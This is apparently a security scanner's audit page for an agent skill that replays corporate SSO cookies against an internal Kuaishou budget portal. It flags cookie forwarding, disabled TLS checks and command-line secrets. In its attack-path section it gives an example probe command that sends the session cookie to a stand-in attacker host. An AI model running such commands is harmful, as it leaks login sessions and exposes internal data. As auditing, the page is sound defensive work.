Back to skill

Security audit

Kuaishou Genius Actual

Security checks for vulnerabilities and agentic risk

Overview

This skill is not overtly malicious, but it should be reviewed because it reuses live corporate login cookies against an internal financial portal with weak safeguards.

Install only if you are authorized to probe this internal Kuaishou budget system and can protect session material. Do not paste live SSO cookies into shared terminals, CI logs, tickets, screenshots, or shell history; avoid --insecure; and restrict any use to the exact approved HTTPS host and approved read-only analysis workflow.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (3)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/genius_client.py:35
Finding

Unrestricted destination and disabled TLS verification can disclose the corporate SSO session

Content
View full analysis
ApiResponse: if not path.startswith("/"): path = "/" + path url = self.base_url + path if query: url += "?" + urllib.parse.urlencode(query, doseq=True) headers = { "Cookie": self.cookie, "Accept": "application/json, text/plain, */*", "User-Agent": "genius-client/1.0", } data: Optional[bytes] = None if body is not None: data = json.dumps(body, ensure_ascii=False).encode("utf-8") headers["Content-Type"] = "application/json" req = urllib.request.Request(url=url, method=method.upper(), headers=headers, data=data) try: with urllib.request.urlopen(req, timeout=self.timeout, context=self._ssl_ctx) as resp: ``` ```python p.add_argument("--base-url", default="https://genius.corp.kuaishou.com", help="Base URL") p.add_argument("--cookie", required=True, help="Cookie string, e.g. 'accessproxy_session=xxx; other=yyy'") p.add_argument("--year", type=int, default=2026, help="Year parameter") p.add_argument("--payload-file", help="JSON payload file for detail/products") p.add_argument("--products-payload-file", help="JSON p ...[truncated 2453 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Error
Location
scripts/genius_api_probe.sh:4
Finding

Shell probe forwards the SSO cookie to an arbitrary base URL

Content
View full analysis
>> GET $path" curl -sS -i \ -H "Cookie: $COOKIE" \ "$BASE_URL$path" | head -c 800 echo } function hit_post() { local path="$1" local body="$2" echo "\n>>> POST $path" curl -sS -i \ -H "Cookie: $COOKIE" \ -H "Content-Type: application/json" \ -X POST \ -d "$body" \ "$BASE_URL$path" | head -c 800 echo } ``` ### Technical Analysis The shell probe accepts any value through `--base-url` and concatenates that value with fixed API paths. The supplied SSO cookie is then added to every request through a raw `Cookie` header. There is no validation of the hostname, scheme, port, or URL structure. A caller can therefore select an attacker-controlled HTTPS destination or a plaintext HTTP endpoint. The configurability is unnecessary for the declared single-host workflow and violates least-privilege credential handling. The script also does not use curl options such as `--proto '=https'` to prevent plaintext protocols or `--config /dev/null` to avoid behavior inherited from a user-controlled curl configuration file. ### Attack Path 1. A user obtains a valid Kuaishou `accessproxy_session` cookie. 2. The user is induced to run a modified command: ```bash bash genius_api_probe.sh \ --base-url "https://attacker.example" \ --cookie "accessproxy_session=" \ --year 2026 ...[truncated 935 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
SKILL.md:20
Finding

SSO session cookie is passed through command-line arguments

Content
View full analysis
" \ --year 2026 python3 genius_client.py \ --cookie "accessproxy_session=" \ workflow --year 2026 ``` From `scripts/genius_client.py`: ```python Usage examples: python3 genius_client.py --cookie "accessproxy_session=xxx" user python3 genius_client.py --cookie "accessproxy_session=xxx" versions --year 2026 python3 genius_client.py --cookie "accessproxy_session=xxx" detail --payload-file detail.json python3 genius_client.py --cookie "accessproxy_session=xxx" workflow --year 2026 ``` ```python p.add_argument("--cookie", required=True, help="Cookie string, e.g. 'accessproxy_session=xxx; other=yyy'") ``` From `scripts/genius_api_probe.sh`: ```bash while [[ $# -gt 0 ]]; do case "$1" in --base-url) BASE_URL="$2"; shift 2 ;; --cookie) COOKIE="$2"; shift 2 ;; --year) YEAR="$2"; shift 2 ;; *) echo "Unknown arg: $1"; exit 1 ;; esac done if [[ -z "$COOKIE" ]]; then echo "ERROR: --cookie is required, e.g. --cookie 'accessproxy_session=xxx'" exit 1 fi ``` ### Technical Analysis The documentation and both clients require the session cookie to be supplied directly as a command-line argument. Command-line secrets can be exposed through: - Shell history files - Process listings available to authorized local observers - Process execution telemetry - CI/CD job metadata and logs - Terminal transcripts and copied support diagnostics - Wrapper scripts that record complete invocations Quoting the cookie prevents shell expansion but does not prevent history or process-argument disclosure. A live SSO session i ...[truncated 980 chars]
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (8)

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
92% confidence
Finding

The skill advertises shell, network, and file-reading style capabilities but does not declare any explicit tool scope or permissions boundaries. In this context, the content directs an agent to perform live network capture, reuse authenticated sessions, and run probing scripts against an internal corporate service, so the lack of scope declaration increases the chance of over-privileged or unintended execution.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The activation text is broad enough to trigger on many requests involving analysis, debugging, automation, API mapping, session reuse, or probing. Because this skill is specifically oriented toward reverse-engineering and scripted access to an internal budget portal, overbroad triggering can cause the agent to invoke risky guidance in contexts where the user did not clearly request sensitive network or credential-handling actions.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

The skill explicitly instructs the operator to supply a live accessproxy_session cookie to shell and Python scripts for API probing, but provides no warning about secret handling, logging exposure, shell history leakage, or authorization boundaries. In this skill's context, that enables authenticated replay against an internal corporate system and materially lowers the barrier to misuse, credential exposure, or unauthorized data access if the cookie is mishandled.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

The script requires a live authentication cookie and automatically reuses it in multiple requests to internal budget-portal endpoints. In the context of a skill explicitly designed for API probing, capture, and payload reconstruction, this normalizes credential reuse and encourages users to paste sensitive session material into command-line history and transmit it to endpoints without safeguards, increasing risk of session theft, unauthorized access, or misuse of privileged internal data.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
91% confidence
Finding

This POST logic transmits both an authentication cookie and attacker-adjustable request bodies to internal endpoints, enabling scripted replay of authenticated actions against the budget system. Given the skill's stated purpose of reverse-engineering API mapping, session reuse, and script-based probing, the external transmission is more dangerous than a generic API client because it facilitates authenticated endpoint enumeration and reconstruction of undocumented requests.

Content

Scanner excerpt · scripts/genius_api_probe.sh (reported line 35)May include surrounding context.

sh
local path="$1"
  local body="$2"
  echo "\n>>> POST $path"
  curl -sS -i \
    -H "Cookie: $COOKIE" \
    -H "Content-Type: application/json" \
    -X POST \

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The client provides an option to disable TLS certificate and hostname verification, which enables man-in-the-middle interception or modification of authenticated requests. Because this tool is explicitly designed to reuse session cookies against internal corporate APIs, the insecure mode can expose credentials and sensitive business data in transit.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

Allowing TLS verification to be disabled without a strong safety warning makes it easy for users to run the client in an unsafe configuration and normalize insecure transport practices. In this skill's context, the tool targets authenticated internal endpoints and session reuse, so insecure transport substantially raises the risk of credential theft and tampering.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The script prints full authenticated API responses to stdout, including data from user, org-tree, ledger detail, and product endpoints that may contain private employee or business information. In CLI and automation contexts, stdout is often logged, captured in shell history, CI artifacts, or shared terminals, increasing the chance of unintended disclosure.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.